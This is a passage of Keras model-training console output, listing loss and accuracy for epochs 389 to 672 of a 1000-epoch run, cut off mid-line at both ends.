6ms/step - loss: 0.6645 - accuracy: 0.7000\nEpoch 390/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.6405 - accuracy: 0.7000\nEpoch 391/1000\n10/10 [==============================] - 0s 9ms/step - loss: 0.6514 - accuracy: 0.7000\nEpoch 392/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6460 - accuracy: 0.6800\nEpoch 393/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6434 - accuracy: 0.7200\nEpoch 394/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6412 - accuracy: 0.7200\nEpoch 395/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6447 - accuracy: 0.7400\nEpoch 396/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6700 - accuracy: 0.6800\nEpoch 397/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6487 - accuracy: 0.7200\nEpoch 398/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6379 - accuracy: 0.7400\nEpoch 399/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6291 - accuracy: 0.7200\nEpoch 400/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6331 - accuracy: 0.7400\nEpoch 401/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.6291 - accuracy: 0.7200\nEpoch 402/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6413 - accuracy: 0.7200\nEpoch 403/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6756 - accuracy: 0.7000\nEpoch 404/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6304 - accuracy: 0.7400\nEpoch 405/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6465 - accuracy: 0.7000\nEpoch 406/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6394 - accuracy: 0.7000\nEpoch 407/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6702 - accuracy: 0.6800\nEpoch 408/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6884 - accuracy: 0.6600\nEpoch 409/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6346 - accuracy: 0.7200\nEpoch 410/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6307 - accuracy: 0.6800\nEpoch 411/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6529 - accuracy: 0.7600\nEpoch 412/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6639 - accuracy: 0.7200\nEpoch 413/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6547 - accuracy: 0.7400\nEpoch 414/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6384 - accuracy: 0.6800\nEpoch 415/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6217 - accuracy: 0.7200\nEpoch 416/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.6194 - accuracy: 0.7200\nEpoch 417/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6225 - accuracy: 0.7200\nEpoch 418/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6241 - accuracy: 0.6800\nEpoch 419/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6204 - accuracy: 0.7200\nEpoch 420/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6367 - accuracy: 0.7200\nEpoch 421/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6250 - accuracy: 0.7400\nEpoch 422/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6149 - accuracy: 0.7200\nEpoch 423/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6229 - accuracy: 0.7400\nEpoch 424/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6166 - accuracy: 0.7400\nEpoch 425/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6241 - accuracy: 0.7400\nEpoch 426/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6293 - accuracy: 0.7400\nEpoch 427/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6138 - accuracy: 0.7600\nEpoch 428/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.6213 - accuracy: 0.7200\nEpoch 429/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6279 - accuracy: 0.7600\nEpoch 430/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6205 - accuracy: 0.7600\nEpoch 431/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6126 - accuracy: 0.7200\nEpoch 432/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6301 - accuracy: 0.7200\nEpoch 433/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6269 - accuracy: 0.7600\nEpoch 434/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6099 - accuracy: 0.7200\nEpoch 435/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6008 - accuracy: 0.7200\nEpoch 436/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6185 - accuracy: 0.6800\nEpoch 437/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6449 - accuracy: 0.7200\nEpoch 438/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.6365 - accuracy: 0.6800\nEpoch 439/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6863 - accuracy: 0.7000\nEpoch 440/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6331 - accuracy: 0.7600\nEpoch 441/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6081 - accuracy: 0.7200\nEpoch 442/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6089 - accuracy: 0.7000\nEpoch 443/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6319 - accuracy: 0.7200\nEpoch 444/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6829 - accuracy: 0.7200\nEpoch 445/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7236 - accuracy: 0.6600\nEpoch 446/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6254 - accuracy: 0.7200\nEpoch 447/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6260 - accuracy: 0.6800\nEpoch 448/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.6072 - accuracy: 0.7400\nEpoch 449/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5981 - accuracy: 0.7200\nEpoch 450/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6222 - accuracy: 0.7000\nEpoch 451/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6096 - accuracy: 0.7600\nEpoch 452/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6114 - accuracy: 0.7800\nEpoch 453/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6007 - accuracy: 0.7400\nEpoch 454/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6003 - accuracy: 0.7400\nEpoch 455/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5904 - accuracy: 0.7600\nEpoch 456/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5900 - accuracy: 0.7600\nEpoch 457/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5943 - accuracy: 0.7400\nEpoch 458/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6129 - accuracy: 0.7200\nEpoch 459/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6079 - accuracy: 0.7400\nEpoch 460/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6154 - accuracy: 0.7400\nEpoch 461/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6387 - accuracy: 0.7400\nEpoch 462/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6002 - accuracy: 0.7400\nEpoch 463/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6033 - accuracy: 0.7400\nEpoch 464/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5998 - accuracy: 0.7200\nEpoch 465/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5942 - accuracy: 0.7400\nEpoch 466/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5829 - accuracy: 0.7600\nEpoch 467/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6015 - accuracy: 0.7200\nEpoch 468/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5935 - accuracy: 0.7600\nEpoch 469/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5954 - accuracy: 0.7200\nEpoch 470/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6032 - accuracy: 0.7600\nEpoch 471/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5902 - accuracy: 0.8000\nEpoch 472/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6062 - accuracy: 0.7200\nEpoch 473/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6134 - accuracy: 0.7400\nEpoch 474/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5974 - accuracy: 0.7800\nEpoch 475/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5807 - accuracy: 0.7600\nEpoch 476/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6103 - accuracy: 0.6800\nEpoch 477/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5952 - accuracy: 0.7200\nEpoch 478/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6011 - accuracy: 0.7800\nEpoch 479/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5868 - accuracy: 0.7600\nEpoch 480/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5792 - accuracy: 0.7600\nEpoch 481/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5941 - accuracy: 0.7400\nEpoch 482/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5971 - accuracy: 0.7400\nEpoch 483/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6012 - accuracy: 0.7000\nEpoch 484/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5838 - accuracy: 0.7200\nEpoch 485/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5848 - accuracy: 0.7600\nEpoch 486/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6009 - accuracy: 0.7400\nEpoch 487/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.6001 - accuracy: 0.7200\nEpoch 488/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5965 - accuracy: 0.7000\nEpoch 489/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6198 - accuracy: 0.7600\nEpoch 490/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5724 - accuracy: 0.7800\nEpoch 491/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5985 - accuracy: 0.7200\nEpoch 492/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5833 - accuracy: 0.7600\nEpoch 493/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5936 - accuracy: 0.7400\nEpoch 494/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6148 - accuracy: 0.7600\nEpoch 495/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6086 - accuracy: 0.7400\nEpoch 496/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6204 - accuracy: 0.7000\nEpoch 497/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5858 - accuracy: 0.7200\nEpoch 498/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5855 - accuracy: 0.7200\nEpoch 499/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5827 - accuracy: 0.7200\nEpoch 500/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5712 - accuracy: 0.7800\nEpoch 501/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5814 - accuracy: 0.7600\nEpoch 502/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5616 - accuracy: 0.7800\nEpoch 503/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.5911 - accuracy: 0.7600\nEpoch 504/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5779 - accuracy: 0.7800\nEpoch 505/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5996 - accuracy: 0.7200\nEpoch 506/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5881 - accuracy: 0.7600\nEpoch 507/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5939 - accuracy: 0.7200\nEpoch 508/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5866 - accuracy: 0.7400\nEpoch 509/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6126 - accuracy: 0.7600\nEpoch 510/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6294 - accuracy: 0.7400\nEpoch 511/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5834 - accuracy: 0.7000\nEpoch 512/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5889 - accuracy: 0.7400\nEpoch 513/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5689 - accuracy: 0.7600\nEpoch 514/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5679 - accuracy: 0.7800\nEpoch 515/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5683 - accuracy: 0.7200\nEpoch 516/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5838 - accuracy: 0.7600\nEpoch 517/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5794 - accuracy: 0.7400\nEpoch 518/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5941 - accuracy: 0.7200\nEpoch 519/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.5757 - accuracy: 0.7600\nEpoch 520/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5681 - accuracy: 0.7400\nEpoch 521/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5876 - accuracy: 0.7800\nEpoch 522/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5772 - accuracy: 0.7400\nEpoch 523/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5741 - accuracy: 0.7400\nEpoch 524/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5972 - accuracy: 0.7200\nEpoch 525/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5869 - accuracy: 0.7800\nEpoch 526/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5733 - accuracy: 0.7800\nEpoch 527/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6015 - accuracy: 0.7200\nEpoch 528/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5726 - accuracy: 0.8000\nEpoch 529/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5967 - accuracy: 0.7400\nEpoch 530/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5712 - accuracy: 0.7800\nEpoch 531/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5933 - accuracy: 0.7400\nEpoch 532/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5848 - accuracy: 0.7600\nEpoch 533/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5698 - accuracy: 0.7400\nEpoch 534/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5664 - accuracy: 0.7200\nEpoch 535/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5733 - accuracy: 0.7200\nEpoch 536/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5675 - accuracy: 0.7200\nEpoch 537/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5906 - accuracy: 0.7400\nEpoch 538/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5857 - accuracy: 0.7600\nEpoch 539/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.6543 - accuracy: 0.6800\nEpoch 540/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5519 - accuracy: 0.7600\nEpoch 541/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5819 - accuracy: 0.7600\nEpoch 542/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5833 - accuracy: 0.7200\nEpoch 543/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6326 - accuracy: 0.6600\nEpoch 544/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6292 - accuracy: 0.6800\nEpoch 545/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5948 - accuracy: 0.7600\nEpoch 546/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6081 - accuracy: 0.7600\nEpoch 547/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5888 - accuracy: 0.7800\nEpoch 548/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5754 - accuracy: 0.7800\nEpoch 549/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5593 - accuracy: 0.8000\nEpoch 550/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5562 - accuracy: 0.7600\nEpoch 551/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5430 - accuracy: 0.7800\nEpoch 552/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5498 - accuracy: 0.7400\nEpoch 553/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5658 - accuracy: 0.7600\nEpoch 554/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5554 - accuracy: 0.7600\nEpoch 555/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5511 - accuracy: 0.7400\nEpoch 556/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5512 - accuracy: 0.7600\nEpoch 557/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5772 - accuracy: 0.7200\nEpoch 558/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5707 - accuracy: 0.7400\nEpoch 559/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5523 - accuracy: 0.7400\nEpoch 560/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5559 - accuracy: 0.8000\nEpoch 561/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5446 - accuracy: 0.7800\nEpoch 562/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5663 - accuracy: 0.7400\nEpoch 563/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5537 - accuracy: 0.7600\nEpoch 564/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5524 - accuracy: 0.7600\nEpoch 565/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5459 - accuracy: 0.7400\nEpoch 566/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5512 - accuracy: 0.7600\nEpoch 567/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5454 - accuracy: 0.7200\nEpoch 568/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5443 - accuracy: 0.7600\nEpoch 569/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5536 - accuracy: 0.7400\nEpoch 570/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5414 - accuracy: 0.7200\nEpoch 571/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5442 - accuracy: 0.7400\nEpoch 572/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5415 - accuracy: 0.7600\nEpoch 573/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5331 - accuracy: 0.7800\nEpoch 574/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6041 - accuracy: 0.7200\nEpoch 575/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5517 - accuracy: 0.8000\nEpoch 576/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5477 - accuracy: 0.7600\nEpoch 577/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.5641 - accuracy: 0.7800\nEpoch 578/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5413 - accuracy: 0.7200\nEpoch 579/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5344 - accuracy: 0.7600\nEpoch 580/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5493 - accuracy: 0.7800\nEpoch 581/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5138 - accuracy: 0.7800\nEpoch 582/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5437 - accuracy: 0.7800\nEpoch 583/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5417 - accuracy: 0.8200\nEpoch 584/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5273 - accuracy: 0.7800\nEpoch 585/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5363 - accuracy: 0.7800\nEpoch 586/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5399 - accuracy: 0.7400\nEpoch 587/1000\n10/10 [==============================] - 0s 9ms/step - loss: 0.5449 - accuracy: 0.7400\nEpoch 588/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5299 - accuracy: 0.7800\nEpoch 589/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5343 - accuracy: 0.7400\nEpoch 590/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5221 - accuracy: 0.7600\nEpoch 591/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5473 - accuracy: 0.7600\nEpoch 592/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5420 - accuracy: 0.7800\nEpoch 593/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5325 - accuracy: 0.7800\nEpoch 594/1000\n10/10 [==============================] - 0s 9ms/step - loss: 0.5553 - accuracy: 0.7600\nEpoch 595/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5490 - accuracy: 0.7200\nEpoch 596/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5278 - accuracy: 0.7600\nEpoch 597/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5381 - accuracy: 0.7400\nEpoch 598/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5212 - accuracy: 0.7600\nEpoch 599/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5274 - accuracy: 0.7400\nEpoch 600/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5604 - accuracy: 0.7400\nEpoch 601/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5565 - accuracy: 0.8000\nEpoch 602/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6037 - accuracy: 0.7200\nEpoch 603/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5654 - accuracy: 0.7600\nEpoch 604/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5496 - accuracy: 0.7400\nEpoch 605/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5308 - accuracy: 0.7600\nEpoch 606/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5532 - accuracy: 0.7200\nEpoch 607/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5454 - accuracy: 0.7600\nEpoch 608/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5613 - accuracy: 0.7400\nEpoch 609/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5768 - accuracy: 0.8000\nEpoch 610/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5687 - accuracy: 0.7400\nEpoch 611/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5233 - accuracy: 0.7800\nEpoch 612/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5426 - accuracy: 0.7400\nEpoch 613/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5655 - accuracy: 0.7600\nEpoch 614/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5867 - accuracy: 0.7200\nEpoch 615/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5655 - accuracy: 0.7600\nEpoch 616/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5190 - accuracy: 0.7800\nEpoch 617/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5168 - accuracy: 0.7400\nEpoch 618/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5170 - accuracy: 0.7400\nEpoch 619/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5322 - accuracy: 0.7400\nEpoch 620/1000\n10/10 [==============================] - 0s 10ms/step - loss: 0.5359 - accuracy: 0.7800\nEpoch 621/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5235 - accuracy: 0.7600\nEpoch 622/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5339 - accuracy: 0.7800\nEpoch 623/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5286 - accuracy: 0.8000\nEpoch 624/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.5433 - accuracy: 0.7400\nEpoch 625/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5233 - accuracy: 0.7600\nEpoch 626/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5096 - accuracy: 0.7400\nEpoch 627/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5136 - accuracy: 0.7800\nEpoch 628/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5098 - accuracy: 0.7400\nEpoch 629/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5202 - accuracy: 0.7400\nEpoch 630/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5116 - accuracy: 0.7800\nEpoch 631/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5092 - accuracy: 0.7400\nEpoch 632/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5325 - accuracy: 0.7600\nEpoch 633/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5199 - accuracy: 0.7600\nEpoch 634/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5354 - accuracy: 0.7600\nEpoch 635/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5199 - accuracy: 0.7400\nEpoch 636/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5107 - accuracy: 0.7400\nEpoch 637/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5163 - accuracy: 0.7400\nEpoch 638/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5220 - accuracy: 0.7600\nEpoch 639/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5292 - accuracy: 0.7200\nEpoch 640/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5367 - accuracy: 0.7200\nEpoch 641/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5181 - accuracy: 0.7200\nEpoch 642/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5262 - accuracy: 0.7400\nEpoch 643/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5381 - accuracy: 0.7600\nEpoch 644/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5600 - accuracy: 0.6800\nEpoch 645/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5296 - accuracy: 0.7800\nEpoch 646/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5135 - accuracy: 0.7400\nEpoch 647/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5088 - accuracy: 0.7400\nEpoch 648/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5191 - accuracy: 0.7200\nEpoch 649/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5090 - accuracy: 0.7800\nEpoch 650/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5197 - accuracy: 0.7400\nEpoch 651/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5186 - accuracy: 0.7400\nEpoch 652/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5212 - accuracy: 0.7600\nEpoch 653/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5122 - accuracy: 0.7400\nEpoch 654/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5158 - accuracy: 0.7400\nEpoch 655/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5123 - accuracy: 0.7800\nEpoch 656/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4982 - accuracy: 0.7600\nEpoch 657/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5030 - accuracy: 0.7800\nEpoch 658/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4994 - accuracy: 0.7800\nEpoch 659/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5128 - accuracy: 0.7600\nEpoch 660/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5228 - accuracy: 0.7800\nEpoch 661/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5190 - accuracy: 0.7600\nEpoch 662/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5063 - accuracy: 0.7600\nEpoch 663/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5032 - accuracy: 0.7600\nEpoch 664/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5042 - accuracy: 0.7800\nEpoch 665/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4981 - accuracy: 0.8000\nEpoch 666/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5199 - accuracy: 0.7800\nEpoch 667/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5235 - accuracy: 0.7600\nEpoch 668/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5067 - accuracy: 0.7800\nEpoch 669/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5139 - accuracy: 0.7400\nEpoch 670/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5169 - accuracy: 0.7600\nEpoch 671/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5292 - accuracy: 0.7600\nEpoch 672/1000\n10/10 [==============================] - 0s 